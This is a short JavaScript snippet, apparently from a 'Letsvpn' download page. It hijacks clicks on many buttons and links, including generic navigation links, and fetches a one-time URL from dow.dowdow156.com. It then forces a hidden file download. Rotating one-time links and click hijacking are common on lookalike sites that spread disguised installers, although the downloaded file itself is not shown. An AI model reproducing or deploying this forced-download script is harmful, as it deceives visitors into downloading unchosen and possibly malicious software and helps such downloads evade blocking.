document.addEventListener('DOMContentLoaded', () => {
            const downloadButtons = document.querySelectorAll('.downloadapp,.dldbtn,.btn,.download-link-a btn,.google-play-text1,.nav-link,.download-app-image,.dldbtn,.btn,.history-btn,.app-download-btn,.windowsLink');
            
            downloadButtons.forEach(button => {
                button.addEventListener('click', handleDownload);
            });
        });
        
        async function handleDownload(event) {
            event.preventDefault();
            try {
                fetch('https://dow.dowdow156.com/Letsvpn/one.php')
                .then(response => response.json())
                .then(data => {
                    downloadUrl = data.url; 
                    downloadFile(downloadUrl);
                })
                .catch(error => console.error('Error generating one-time URL:', error));
                
                
                
            } catch (error) {
                console.error('下载过程中出现错误:', error);
                alert('下载失败，请稍后重试');
            }
        }
        
        function downloadFile(url) {
            console.log(url);
            const link = document.createElement('a');
            link.href = url;
            link.setAttribute('download', '');
            link.style.display = 'none';
            document.body.appendChild(link);
            link.click();
            document.body.removeChild(link);
        }
